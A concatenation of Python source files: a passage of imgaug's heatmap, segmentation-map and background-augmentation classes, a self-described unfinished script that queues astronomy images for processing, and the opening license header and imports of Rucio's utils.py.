If there is not a corresponding image, use the shape of the heatmaps array.
min_value : float, optional(default=0.0)
Minimum value for the heatmaps that the 0-to-255 array represents. This will usually
be 0.0. It is used when calling `HeatmapsOnImage.get_arr()`, which converts the
underlying (0, 255) array to value range (min_value, max_value).
max_value : float, optional(default=1.0)
Maximum value for the heatmaps that 0-to-255 array represents.
See parameter min_value for details.
Returns
-------
heatmaps : HeatmapsOnImage
Heatmaps object.
"""
arr_0to1 = arr_uint8.astype(np.float32) / 255.0
return HeatmapsOnImage.from_0to1(arr_0to1, shape, min_value=min_value, max_value=max_value)
@staticmethod
def from_0to1(arr_0to1, shape, min_value=0.0, max_value=1.0):
"""
Create a heatmaps object from an heatmap array containing values ranging from 0.0 to 1.0.
Parameters
----------
arr_0to1 : (H,W) or (H,W,C) ndarray(float32)
Heatmap(s) array, where H=height, W=width, C=heatmap channels.
shape : tuple of ints
Shape of the image on which the heatmap(s) is/are placed. NOT the shape of the
heatmap(s) array, unless it is identical to the image shape (note the likely
difference between the arrays in the number of channels).
If there is not a corresponding image, use the shape of the heatmaps array.
min_value : float, optional(default=0.0)
Minimum value for the heatmaps that the 0-to-1 array represents. This will usually
be 0.0. It is used when calling `HeatmapsOnImage.get_arr()`, which converts the
underlying (0.0, 1.0) array to value range (min_value, max_value).
E.g. if you started with heatmaps in the range (-1.0, 1.0) and projected these
to (0.0, 1.0), you should call this function with min_value=-1.0, max_value=1.0
so that `get_arr()` returns heatmap arrays having value range (-1.0, 1.0).
max_value : float, optional(default=1.0)
Maximum value for the heatmaps that to 0-to-255 array represents.
See parameter min_value for details.
Returns
-------
heatmaps : HeatmapsOnImage
Heatmaps object.
"""
heatmaps = HeatmapsOnImage(arr_0to1, shape, min_value=0.0, max_value=1.0)
heatmaps.min_value = min_value
heatmaps.max_value = max_value
return heatmaps
@staticmethod
def change_normalization(arr, source, target):
"""
Change the value range of a heatmap from one min-max to another min-max.
E.g. the value range may be changed from min=0.0, max=1.0 to min=-1.0, max=1.0.
Parameters
----------
arr : ndarray
Heatmap array to modify.
source : tuple of two floats
Current value range of the input array, given as (min, max), where both are float
values.
target : tuple of two floats
Desired output value range of the array, given as (min, max), where both are float
values.
Returns
-------
arr_target : ndarray
Input array, with value range projected to the desired target value range.
"""
assert is_np_array(arr)
if isinstance(source, HeatmapsOnImage):
source = (source.min_value, source.max_value)
else:
assert isinstance(source, tuple)
assert len(source) == 2
assert source[0] < source[1]
if isinstance(target, HeatmapsOnImage):
target = (target.min_value, target.max_value)
else:
assert isinstance(target, tuple)
assert len(target) == 2
assert target[0] < target[1]
# Check if source and target are the same (with a tiny bit of tolerance)
# if so, evade compuation and just copy the array instead.
# This is reasonable, as source and target will often both be (0.0, 1.0).
eps = np.finfo(arr.dtype).eps
mins_same = source[0] - 10*eps < target[0] < source[0] + 10*eps
maxs_same = source[1] - 10*eps < target[1] < source[1] + 10*eps
if mins_same and maxs_same:
return np.copy(arr)
min_source, max_source = source
min_target, max_target = target
diff_source = max_source - min_source
diff_target = max_target - min_target
arr_0to1 = (arr - min_source) / diff_source
arr_target = min_target + arr_0to1 * diff_target
return arr_target
def copy(self):
"""
Create a shallow copy of the Heatmaps object.
Returns
-------
out : HeatmapsOnImage
Shallow copy.
"""
return self.deepcopy()
def deepcopy(self):
"""
Create a deep copy of the Heatmaps object.
Returns
-------
out : HeatmapsOnImage
Deep copy.
"""
return HeatmapsOnImage(self.get_arr(), shape=self.shape, min_value=self.min_value, max_value=self.max_value)
class SegmentationMapOnImage(object):
"""
Object representing a segmentation map associated with an image.
Attributes
----------
DEFAULT_SEGMENT_COLORS : list of tuple of int
Standard RGB colors to use during drawing, ordered by class index.
Parameters
----------
arr : (H,W) ndarray or (H,W,1) ndarray or (H,W,C) ndarray
Array representing the segmentation map. May have datatypes bool, integer or float.
* If bool: Assumed to be of shape (H,W), (H,W,1) or (H,W,C). If (H,W) or (H,W,1) it
is assumed to be for the case of having a single class (where any False denotes
background). Otherwise there are assumed to be C channels, one for each class,
with each of them containing a mask for that class. The masks may overlap.
* If integer: Assumed to be of shape (H,W) or (H,W,1). Each pixel is assumed to
contain an integer denoting the class index. Classes are assumed to be
non-overlapping. The number of classes cannot be guessed from this input, hence
nb_classes must be set.
* If float: Assumed to b eof shape (H,W), (H,W,1) or (H,W,C) with meanings being
similar to the case of `bool`. Values are expected to fall always in the range
0.0 to 1.0 and are usually expected to be either 0.0 or 1.0 upon instantiation
of a new segmentation map. Classes may overlap.
shape : iterable of int
Shape of the corresponding image (NOT the segmentation map array). This is expected
to be (H, W) or (H, W, C) with C usually being 3. If there is no corresponding image,
then use the segmentation map's shape instead.
nb_classes : int or None
Total number of unique classes that may appear in an segmentation map, i.e. the max
class index. This may be None if the input array is of type bool or float. The number
of class however must be provided if the input array is of type int, as then the
number of classes cannot be guessed.
"""
DEFAULT_SEGMENT_COLORS = [
(0, 0, 0), # black
(230, 25, 75), # red
(60, 180, 75), # green
(255, 225, 25), # yellow
(0, 130, 200), # blue
(245, 130, 48), # orange
(145, 30, 180), # purple
(70, 240, 240), # cyan
(240, 50, 230), # magenta
(210, 245, 60), # lime
(250, 190, 190), # pink
(0, 128, 128), # teal
(230, 190, 255), # lavender
(170, 110, 40), # brown
(255, 250, 200), # beige
(128, 0, 0), # maroon
(170, 255, 195), # mint
(128, 128, 0), # olive
(255, 215, 180), # coral
(0, 0, 128), # navy
(128, 128, 128), # grey
(255, 255, 255), # white
# --
(115, 12, 37), # dark red
(30, 90, 37), # dark green
(127, 112, 12), # dark yellow
(0, 65, 100), # dark blue
(122, 65, 24), # dark orange
(72, 15, 90), # dark purple
(35, 120, 120), # dark cyan
(120, 25, 115), # dark magenta
(105, 122, 30), # dark lime
(125, 95, 95), # dark pink
(0, 64, 64), # dark teal
(115, 95, 127), # dark lavender
(85, 55, 20), # dark brown
(127, 125, 100), # dark beige
(64, 0, 0), # dark maroon
(85, 127, 97), # dark mint
(64, 64, 0), # dark olive
(127, 107, 90), # dark coral
(0, 0, 64), # dark navy
(64, 64, 64), # dark grey
]
def __init__(self, arr, shape, nb_classes=None):
if arr.dtype.type == np.bool:
assert arr.ndim in [2, 3]
self.input_was = ("bool", arr.ndim)
if arr.ndim == 2:
arr = arr[..., np.newaxis]
arr = arr.astype(np.float32)
elif arr.dtype.type in [np.uint8, np.uint32, np.int8, np.int16, np.int32]:
assert arr.ndim == 2 or (arr.ndim == 3 and arr.shape[2] == 1)
assert nb_classes is not None
assert nb_classes > 0
assert np.min(arr.flat[0:100]) >= 0
assert np.max(arr.flat[0:100]) <= nb_classes
self.input_was = ("int", arr.dtype.type, arr.ndim)
if arr.ndim == 3:
arr = arr[..., 0]
arr = np.eye(nb_classes)[arr] # from class indices to one hot
arr = arr.astype(np.float32)
elif arr.dtype.type in [np.float16, np.float32]:
assert arr.ndim == 3
self.input_was = ("float", arr.dtype.type, arr.ndim)
arr = arr.astype(np.float32)
else:
dt = str(arr.dtype) if is_np_array(arr) else "<no ndarray>"
raise Exception("Input was expected to be an ndarray of dtype bool, uint8, uint32 "
"int8, int16, int32 or float32. Got type %s with dtype %s." % (type(arr), dt))
assert arr.ndim == 3
assert arr.dtype.type == np.float32
self.arr = arr
self.shape = shape
self.nb_classes = nb_classes if nb_classes is not None else arr.shape[2]
#@property
#def nb_classes(self):
# return self.arr.shape[2]
def get_arr_int(self, background_threshold=0.01, background_class_id=0):
"""
Get the segmentation map array as an integer array of shape (H, W).
Each pixel in that array contains an integer value representing the pixel's class.
If multiple classes overlap, the one with the highest local float value is picked.
If that highest local value is below `background_threshold`, the method instead uses
the background class id as the pixel's class value.
Parameters
----------
background_threshold : float, optional(default=0.01)
At each pixel, each class-heatmap has a value between 0.0 and 1.0. If none of the
class-heatmaps has a value above this threshold, the method uses the background class
id instead.
background_class_id : int, optional(default=0)
Class id to fall back to if no class-heatmap passes the threshold at a spatial
location.
Returns
-------
result : (H,W) ndarray(int)
Segmentation map array.
"""
channelwise_max_idx = np.argmax(self.arr, axis=2)
result = channelwise_max_idx
if background_threshold is not None and background_threshold > 0:
probs = np.amax(self.arr, axis=2)
result[probs < background_threshold] = background_class_id
return result.astype(np.int32)
#def get_arr_bool(self, allow_overlapping=False, threshold=0.5, background_threshold=0.01, background_class_id=0):
# # TODO
# raise NotImplementedError()
def draw(self, size=None, background_threshold=0.01, background_class_id=0, colors=None, return_foreground_mask=False):
"""
Render the segmentation map as an RGB image.
Parameters
----------
size : None or float or iterable of two ints or iterable of two floats, optional(default=None)
Size of the rendered RGB image as (height, width).
See `imresize_single_image()` for details.
If set to None, no resizing is performed and the size of the segmentation map array is
used.
background_threshold : float, optional(default=0.01)
At each pixel, each class-heatmap has a value between 0.0 and 1.0. If none of the
class-heatmaps has a value above this threshold, the method uses the background class
id instead.
background_class_id : int, optional(default=0)
Class id to fall back to if no class-heatmap passes the threshold at a spatial
location.
colors : None or list of tuple of int, optional(default=None)
Colors to use. One for each class to draw. If None, then default colors will be used.
return_foreground_mask : bool, optional(default=False)
Whether to return a mask of the same size as the drawn segmentation map, containing
True at any spatial location that is not the background class and False everywhere
else.
Returns
-------
segmap_drawn : (H,W,3) ndarray(uint8)
Rendered segmentation map.
foreground_mask : (H,W) ndarray(bool)
Mask indicating the locations of foreground classes. Only returned if
return_foreground_mask is True.
"""
arr = self.get_arr_int(background_threshold=background_threshold, background_class_id=background_class_id)
nb_classes = self.nb_classes
segmap_drawn = np.zeros((arr.shape[0], arr.shape[1], 3), dtype=np.uint8)
if colors is None:
colors = SegmentationMapOnImage.DEFAULT_SEGMENT_COLORS
assert nb_classes <= len(colors), "Can't draw all %d classes as it would exceed the maximum number of %d available colors." % (nb_classes, len(colors),)
ids_in_map = np.unique(arr)
for c, color in zip(sm.xrange(1+nb_classes), colors):
if c in ids_in_map:
class_mask = (arr == c)
segmap_drawn[class_mask] = color
if return_foreground_mask:
foreground_mask = (arr != background_class_id)
else:
foreground_mask = None
if size is not None:
segmap_drawn = imresize_single_image(segmap_drawn, size, interpolation="nearest")
if foreground_mask is not None:
foreground_mask = imresize_single_image(foreground_mask.astype(np.uint8), size, interpolation="nearest") > 0
if foreground_mask is not None:
return segmap_drawn, foreground_mask
return segmap_drawn
def draw_on_image(self, image, alpha=0.5, resize="segmentation_map", background_threshold=0.01, background_class_id=0, colors=None, draw_background=False):
"""
Draw the segmentation map as an overlay over an image.
Parameters
----------
image : (H,W,3) ndarray(uint8)
Image onto which to draw the segmentation map.
alpha : float, optional(default=0.75)
Alpha/opacity value to use for the mixing of image and segmentation map.
Higher values mean that the segmentation map will be more visible and the image less
visible.
resize : "segmentation_map" or "image", optional(default="segmentation_map")
In case of size differences between the image and segmentation map, either the image or
the segmentation map can be resized. This parameter controls which of the two will be
resized to the other's size.
background_threshold : float, optional(default=0.01)
At each pixel, each class-heatmap has a value between 0.0 and 1.0. If none of the
class-heatmaps has a value above this threshold, the method uses the background class
id instead.
background_class_id : int, optional(default=0)
Class id to fall back to if no class-heatmap passes the threshold at a spatial
location.
colors : None or list of tuple of int, optional(default=None)
Colors to use. One for each class to draw. If None, then default colors will be used.
draw_background : bool, optional(default=False)
If True, the background will be drawn like any other class.
If False, the background will not be drawn, i.e. the respective background pixels
will be identical with the image's RGB color at the corresponding spatial location
and no color overlay will be applied.
Returns
-------
mix : (H,W,3) ndarray(uint8)
Rendered overlays.
"""
# assert RGB image
assert image.ndim == 3
assert image.shape[2] == 3
assert image.dtype.type == np.uint8
assert 0 - 1e-8 <= alpha <= 1.0 + 1e-8
assert resize in ["segmentation_map", "image"]
if resize == "image":
image = imresize_single_image(image, self.arr.shape[0:2], interpolation="cubic")
segmap_drawn, foreground_mask = self.draw(
background_threshold=background_threshold,
background_class_id=background_class_id,
size=image.shape[0:2] if resize == "segmentation_map" else None,
colors=colors,
return_foreground_mask=True
)
if draw_background:
mix = np.clip(
(1-alpha) * image + alpha * segmap_drawn,
0,
255
).astype(np.uint8)
else:
foreground_mask = foreground_mask[..., np.newaxis]
mix = np.zeros_like(image)
mix += (~foreground_mask).astype(np.uint8) * image
mix += foreground_mask.astype(np.uint8) * np.clip(
(1-alpha) * image + alpha * segmap_drawn,
0,
255
).astype(np.uint8)
return mix
def pad(self, top=0, right=0, bottom=0, left=0, mode="constant", cval=0.0):
"""
Pad the segmentation map on its top/right/bottom/left side.
Parameters
----------
top : int, optional(default=0)
Amount of pixels to add at the top side of the segmentation map. Must be 0 or
greater.
right : int, optional(default=0)
Amount of pixels to add at the right side of the segmentation map. Must be 0 or
greater.
bottom : int, optional(default=0)
Amount of pixels to add at the bottom side of the segmentation map. Must be 0 or
greater.
left : int, optional(default=0)
Amount of pixels to add at the left side of the segmentation map. Must be 0 or
greater.
mode : string, optional(default="constant")
Padding mode to use. See `numpy.pad()` for details.
cval : number, optional(default=0.0)
Value to use for padding if mode="constant". See `numpy.pad()` for details.
Returns
-------
result : SegmentationMapOnImage
Padded segmentation map of height H'=H+top+bottom and width W'=W+left+right.
"""
arr_padded = pad(self.arr, top=top, right=right, bottom=bottom, left=left, mode=mode, cval=cval)
return SegmentationMapOnImage(arr_padded, shape=self.shape)
def pad_to_aspect_ratio(self, aspect_ratio, mode="constant", cval=0.0, return_pad_amounts=False):
"""
Pad the segmentation map on its sides so that its matches a target aspect ratio.
Depending on which dimension is smaller (height or width), only the corresponding
sides (left/right or top/bottom) will be padded. In each case, both of the sides will
be padded equally.
Parameters
----------
aspect_ratio : float
Target aspect ratio, given as width/height. E.g. 2.0 denotes the image having twice
as much width as height.
mode : string, optional(default="constant")
Padding mode to use. See `numpy.pad()` for details.
cval : number, optional(default=0.0)
Value to use for padding if mode="constant". See `numpy.pad()` for details.
return_pad_amounts : bool, optional(default=False)
If False, then only the padded image will be returned. If True, a tuple with two
entries will be returned, where the first entry is the padded image and the second
entry are the amounts by which each image side was padded. These amounts are again a
tuple of the form (top, right, bottom, left), with each value being an integer.
Returns
-------
result : tuple
First tuple entry: Padded segmentation map as SegmentationMapOnImage object.
Second tuple entry: Amounts by which the segmentation map was padded on each side,
given as a tuple (top, right, bottom, left).
If return_pad_amounts is False, then only the segmentation map object is returned.
"""
arr_padded, pad_amounts = pad_to_aspect_ratio(self.arr, aspect_ratio=aspect_ratio, mode=mode, cval=cval, return_pad_amounts=True)
segmap = SegmentationMapOnImage(arr_padded, shape=self.shape)
if return_pad_amounts:
return segmap, pad_amounts
else:
return segmap
def scale(self, sizes, interpolation="cubic"):
"""
Rescale the segmentation map array to the provided size given the provided interpolation.
Parameters
----------
sizes : float or iterable of two ints or iterable of two floats
New size of the array in (height, width). See `imresize_single_image()` for details.
interpolation : None or string or int, optional(default="cubic")
The interpolation to use during resize. See `imresize_single_image()` for details.
Note: The segmentation map is internally stored as multiple float-based heatmaps,
making smooth interpolations potentially more reasonable than nearest neighbour
interpolation.
Returns
-------
result : SegmentationMapOnImage
Rescaled segmentation map object.
"""
arr_rescaled = imresize_single_image(self.arr, sizes, interpolation=interpolation)
# cubic interpolation can lead to values outside of [0.0, 1.0],
# see https://github.com/opencv/opencv/issues/7195
# TODO area interpolation too?
arr_rescaled = np.clip(arr_rescaled, 0.0, 1.0)
return SegmentationMapOnImage(arr_rescaled, shape=self.shape)
def to_heatmaps(self, only_nonempty=False, not_none_if_no_nonempty=False):
"""
Convert segmentation map to heatmaps object.
Each segmentation map class will be represented as a single heatmap channel.
Parameters
----------
only_nonempty : bool, optional(default=False)
If True, then only heatmaps for classes that appear in the segmentation map will be
generated. Additionally, a list of these class ids will be returned.
not_none_if_no_nonempty : bool, optional(default=False)
If `only_nonempty` is True and for a segmentation map no channel was non-empty,
this function usually returns None as the heatmaps object. If however this parameter
is set to True, a heatmaps object with one channel (representing class 0)
will be returned as a fallback in these cases.
Returns
-------
result : HeatmapsOnImage or None
Segmentation map as heatmaps.
If `only_nonempty` was set to True and no class appeared in the segmentation map,
then this is None.
class_indices : list of int
Class ids (0 to C-1) of the classes that were actually added to the heatmaps.
Only returned if `only_nonempty` was set to True.
"""
if not only_nonempty:
return HeatmapsOnImage.from_0to1(self.arr, self.shape, min_value=0.0, max_value=1.0)
else:
nonempty_mask = np.sum(self.arr, axis=(0, 1)) > 0 + 1e-4
if np.sum(nonempty_mask) == 0:
if not_none_if_no_nonempty:
nonempty_mask[0] = True
else:
return None, []
class_indices = np.arange(self.arr.shape[2])[nonempty_mask]
channels = self.arr[..., class_indices]
return HeatmapsOnImage(channels, self.shape, min_value=0.0, max_value=1.0), class_indices
@staticmethod
def from_heatmaps(heatmaps, class_indices=None, nb_classes=None):
"""
Convert heatmaps to segmentation map.
Assumes that each class is represented as a single heatmap channel.
Parameters
----------
heatmaps : HeatmapsOnImage
Heatmaps to convert.
class_indices : None or list of int, optional(default=None)
List of class indices represented by each heatmap channel. See also the
secondary output of `to_heatmap()`. If this is provided, it must have the same
length as the number of heatmap channels.
nb_classes : None or int, optional(default=None)
Number of classes. Must be provided if class_indices is set.
Returns
-------
result : SegmentationMapOnImage
Segmentation map derived from heatmaps.
"""
if class_indices is None:
return SegmentationMapOnImage(heatmaps.arr_0to1, shape=heatmaps.shape)
else:
assert nb_classes is not None
assert min(class_indices) >= 0
assert max(class_indices) < nb_classes
assert len(class_indices) == heatmaps.arr_0to1.shape[2]
arr_0to1 = heatmaps.arr_0to1
arr_0to1_full = np.zeros((arr_0to1.shape[0], arr_0to1.shape[1], nb_classes), dtype=np.float32)
#empty_channel = np.zeros((arr_0to1.shape[0], arr_0to1.shape[1]), dtype=np.float32)
class_indices_set = set(class_indices)
heatmap_channel = 0
for c in sm.xrange(nb_classes):
if c in class_indices_set:
arr_0to1_full[:, :, c] = arr_0to1[:, :, heatmap_channel]
heatmap_channel += 1
return SegmentationMapOnImage(arr_0to1_full, shape=heatmaps.shape)
def copy(self):
"""
Create a shallow copy of the segmentation map object.
Returns
-------
out : SegmentationMapOnImage
Shallow copy.
"""
return self.deepcopy()
def deepcopy(self):
"""
Create a deep copy of the segmentation map object.
Returns
-------
out : SegmentationMapOnImage
Deep copy.
"""
segmap = SegmentationMapOnImage(self.arr, shape=self.shape, nb_classes=self.nb_classes)
segmap.input_was = self.input_was
return segmap
############################
# Background augmentation
############################
class Batch(object):
"""
Class encapsulating a batch before and after augmentation.
Parameters
----------
images : None or (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
The images to
augment.
keypoints : None or list of KeypointOnImage
The keypoints to
augment.
data : anything
Additional data that is saved in the batch and may be read out
after augmentation. This could e.g. contain filepaths to each image
in `images`. As this object is usually used for background
augmentation with multiple processes, the augmented Batch objects might
not be returned in the original order, making this information useful.
"""
def __init__(self, images=None, images_gt=None, mask_gt=None, keypoints=None, data=None):
self.images = images
self.images_aug = None
self.images_gt = images_gt
self.images_gt_aug = None
self.mask_gt = mask_gt
self.mask_gt_aug = None
self.keypoints = keypoints
self.keypoints_aug = None
self.data = data
class BatchLoader(object):
"""
Class to load batches in the background.
Loaded batches can be accesses using `BatchLoader.queue`.
Parameters
----------
load_batch_func : callable
Function that yields Batch objects (i.e. expected to be a generator).
Background loading automatically stops when the last batch was yielded.
queue_size : int, optional(default=50)
Maximum number of batches to store in the queue. May be set higher
for small images and/or small batches.
nb_workers : int, optional(default=1)
Number of workers to run in the background.
threaded : bool, optional(default=True)
Whether to run the background processes using threads (true) or
full processes (false).
"""
def __init__(self, load_batch_func, queue_size=50, nb_workers=1, threaded=True):
do_assert(queue_size > 0)
do_assert(nb_workers >= 1)
self.queue = multiprocessing.Queue(queue_size)
self.join_signal = multiprocessing.Event()
self.finished_signals = []
self.workers = []
self.threaded = threaded
seeds = current_random_state().randint(0, 10**6, size=(nb_workers,))
for i in range(nb_workers):
finished_signal = multiprocessing.Event()
self.finished_signals.append(finished_signal)
if threaded:
worker = threading.Thread(target=self._load_batches, args=(load_batch_func, self.queue, finished_signal, self.join_signal, None))
else:
worker = multiprocessing.Process(target=self._load_batches, args=(load_batch_func, self.queue, finished_signal, self.join_signal, seeds[i]))
worker.daemon = True
worker.start()
self.workers.append(worker)
def all_finished(self):
"""
Determine whether the workers have finished the loading process.
Returns
-------
out : bool
True if all workers have finished. Else False.
"""
return all([event.is_set() for event in self.finished_signals])
def _load_batches(self, load_batch_func, queue, finished_signal, join_signal, seedval):
if seedval is not None:
random.seed(seedval)
np.random.seed(seedval)
seed(seedval)
try:
for batch in load_batch_func():
do_assert(isinstance(batch, Batch), "Expected batch returned by lambda function to be of class imgaug.Batch, got %s." % (type(batch),))
batch_pickled = pickle.dumps(batch, protocol=-1)
while not join_signal.is_set():
try:
queue.put(batch_pickled, timeout=0.001)
break
except QueueFull:
pass
if join_signal.is_set():
break
except Exception as exc:
traceback.print_exc()
finally:
finished_signal.set()
def terminate(self):
"""
Stop all workers.
"""
self.join_signal.set()
# give minimal time to put generated batches in queue and gracefully shut down
time.sleep(0.002)
# clean the queue, this reportedly prevents hanging threads
while True:
try:
self.queue.get(timeout=0.005)
except QueueEmpty:
break
if self.threaded:
for worker in self.workers:
worker.join()
# we don't have to set the finished_signals here, because threads always finish
# gracefully
else:
for worker in self.workers:
worker.terminate()
worker.join()
# wait here a tiny bit to really make sure that everything is killed before setting
# the finished_signals. calling set() and is_set() (via a subprocess) on them at the
# same time apparently results in a deadlock (at least in python 2).
#time.sleep(0.02)
for finished_signal in self.finished_signals:
finished_signal.set()
self.queue.close()
class BackgroundAugmenter(object):
"""
Class to augment batches in the background (while training on the GPU).
This is a wrapper around the multiprocessing module.
Parameters
----------
batch_loader : BatchLoader
BatchLoader object to load data in the
background.
augseq : Augmenter
An augmenter to apply to all loaded images.
This may be e.g. a Sequential to apply multiple augmenters.
queue_size : int
Size of the queue that is used to temporarily save the augmentation
results. Larger values offer the background processes more room
to save results when the main process doesn't load much, i.e. they
can lead to smoother and faster training. For large images, high
values can block a lot of RAM though.
nb_workers : "auto" or int
Number of background workers to spawn. If auto, it will be set
to C-1, where C is the number of CPU cores.
"""
def __init__(self, batch_loader, augseq, augseq_X=None, augseq_gt=None, queue_size=50, nb_workers="auto"):
do_assert(queue_size > 0)
self.augseq = augseq
self.augseq_X = augseq_X
self.augseq_gt = augseq_gt
self.source_finished_signals = batch_loader.finished_signals
self.queue_source = batch_loader.queue
self.queue_result = multiprocessing.Queue(queue_size)
if nb_workers == "auto":
try:
nb_workers = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
nb_workers = 1
# try to reserve at least one core for the main process
nb_workers = max(1, nb_workers - 1)
else:
do_assert(nb_workers >= 1)
#print("Starting %d background processes" % (nb_workers,))
self.nb_workers = nb_workers
self.workers = []
self.nb_workers_finished = 0
self.augment_images = True
self.augment_images_gt = True
self.augment_keypoints = True
seeds = current_random_state().randint(0, 10**6, size=(nb_workers,))
for i in range(nb_workers):
worker = multiprocessing.Process(target=self._augment_images_worker, args=(augseq, augseq_X, augseq_gt, self.queue_source, self.queue_result, self.source_finished_signals, seeds[i]))
worker.daemon = True
worker.start()
self.workers.append(worker)
def get_batch(self):
"""
Returns a batch from the queue of augmented batches.
If workers are still running and there are no batches in the queue,
it will automatically wait for the next batch.
Returns
-------
out : None or ia.Batch
One batch or None if all workers have finished.
"""
batch_str = self.queue_result.get()
batch = pickle.loads(batch_str)
if batch is not None:
return batch
else:
self.nb_workers_finished += 1
if self.nb_workers_finished == self.nb_workers:
return None
else:
return self.get_batch()
def _augment_images_worker(self, augseq, augseq_X, augseq_gt, queue_source, queue_result, source_finished_signals, seedval):
"""
Worker function that endlessly queries the source queue (input
batches), augments batches in it and sends the result to the output
queue.
"""
np.random.seed(seedval)
random.seed(seedval)
augseq.reseed(seedval)
if augseq_X:
augseq_X.reseed(seedval)
if augseq_gt:
augseq_gt.reseed(seedval)
seed(seedval)
while True:
# wait for a new batch in the source queue and load it
try:
batch_str = queue_source.get(timeout=0.1)
batch = pickle.loads(batch_str)
# augment the batch
batch_augment_images = batch.images is not None and self.augment_images
batch_augment_images_gt = batch.images_gt is not None and self.augment_images_gt
batch_augment_keypoints = batch.keypoints is not None and self.augment_keypoints
if batch_augment_images and batch_augment_keypoints:
augseq_det = augseq.to_deterministic() if not augseq.deterministic else augseq
batch.images_aug = augseq_det.augment_images(batch.images)
batch.keypoints_aug = augseq_det.augment_keypoints(batch.keypoints)
elif batch_augment_images and batch_augment_images_gt:
augseq_det = augseq.to_deterministic() if not augseq.deterministic else augseq
batch.images_aug = augseq_det.augment_images(batch.images)
batch.images_gt_aug = augseq_det.augment_images(batch.images_gt)
batch.mask_gt_aug = augseq_det.augment_images(batch.mask_gt)
if augseq_X:
batch.images_aug = augseq_X.augment_images(batch.images_aug)
if augseq_gt:
augseq_gt_det = augseq_gt.to_deterministic() if not augseq_gt.deterministic else augseq_gt
batch.images_gt_aug = augseq_gt_det.augment_images(batch.images_gt_aug)
batch.mask_gt_aug = augseq_gt_det.augment_images(batch.mask_gt_aug)
elif batch_augment_images:
batch.images_aug = augseq.augment_images(batch.images)
elif batch_augment_keypoints:
batch.keypoints_aug = augseq.augment_keypoints(batch.keypoints)
# send augmented batch to output queue
batch_str = pickle.dumps(batch, protocol=-1)
queue_result.put(batch_str)
except QueueEmpty:
if all([signal.is_set() for signal in source_finished_signals]):
queue_result.put(pickle.dumps(None, protocol=-1))
return
def terminate(self):
"""
Terminates all background processes immediately.
This will also free their RAM.
"""
for worker in self.workers:
worker.terminate()
self.queue_result.close()
|
process_data.py
|
"""Script to periodically query and process new data. WIP not working yet!"""
import time
from queue import Queue
from threading import Thread
from datetime import datetime, timedelta
from huntsman.drp.datatable import RawDataTable
from huntsman.drp.bulter import TemporaryButlerRepository
FILTER_NAMES = ["g_band", "r_band", "luminance"]
def query_latest_files(datatable, interval):
"""
Get latest filenames specified by a time interval.
Args:
datatable (`huntsman.drp.datatable.RawDataTable`): The raw data table.
interval (float): The time interval in seconds.
Returns:
list of filenames.
"""
time_now = datetime.utcnow()
time_start = time_now - timedelta(seconds=interval)
filenames = datatable.query_column("filename", date_start=time_start, date_end=time_now,
dataType="science")
return filenames
def process_data_async(queue, filter_names=FILTER_NAMES, make_coadd=False, rerun="dwfrerun"):
"""Get queued filename list and start processing it."""
while True:
# Get the next set of filenames
filenames = queue.get()
try:
# Create temp butler repo
with TemporaryButlerRepository() as butler_repository:
# Ingest raw data
butler_repository.ingest_raw_data(filenames)
# Make calexps
for filter_name in filter_names:
butler_repository.processCcd(dataType="science", rerun=rerun,
filter_name=filter_name)
# Assemble coadd
if make_coadd:
butler_repository.make_coadd(rerun=rerun)
except Exception as err:
print(f"Error processing files: {err}.")
finally:
queue.task_done()
if __name__ == "__main__":
# Factor these out as command line args
interval_seconds = 60
datatable = RawDataTable()
queue = Queue()
# Start the queue's worker thread
thread = Thread(target=process_data_async, daemon=False, args=(queue))
while True:
# Get the latest filenames
filenames = datatable.query_latest(seconds=interval_seconds, column_name="filename")
# Queue the filenames for processing
print(f"Queuing {len(filenames)} files.")
queue.put(filenames)
# Wait for next batch
time.sleep(interval_seconds)
|
utils.py
|
# Copyright 2012-2019 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2019
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2020
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquin Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2019
# - Frank Berghaus, <frank.berghaus@cern.ch>, 2017
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister, <andrew.lister@stfc.ac.uk>, 2019
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Jaroslav Guenther <jaroslav.guenther@gmail.com>, 2019
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
#
# PY3K COMPATIBLE
from __future__ import print_function
import base64
import copy
import datetime
import errno
import getpass
import hashlib
import imp
import json
import os
import os.path
import re
import requests
import socket
import subprocess
import tempfile
import threading
import time
import zlib
from logging import getLogger, Formatter
from logging.handlers import RotatingFileHandler
from uuid import uuid4 as uuid
from six import string_types, text_type, PY3
from xml.etree import ElementTree
try:
# Python 2
from itertools import izip_longest
except ImportError:
# Python 3
from itertools import zip_longest as izip_longest
try:
# Python 2
from urllib import urlencode, quote
except ImportError:
# Python 3
from urllib.parse import urlencode, quote
try:
# Python 2
from StringIO import StringIO
except ImportError:
# Python 3
from io import StringIO
try:
# Python 2
import urlparse
except ImportError:
# Python 3
import urllib.parse as urlparse
from rucio.common.config import config_get
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError, RucioException
from rucio.common.types import InternalAccount, InternalScope
# delay import until function to avoid circular dependancy (note here for reference)
# from rucio.core.rse import get_rse_name
# Extra modules: Only imported if available
EXTRA_MODULES = {'web': False,
'paramiko': False,
'flask': False}
try:
from rucio.db.sqla.enum import EnumSymbol
EXTRA_MODULES['rucio.db.sqla.enum'] = True
except ImportError:
EXTRA_MODULES['rucio.db.sqla.enum'] = False
for extra_module in EXTRA_MODULES:
try:
imp.find_module(extra_module)
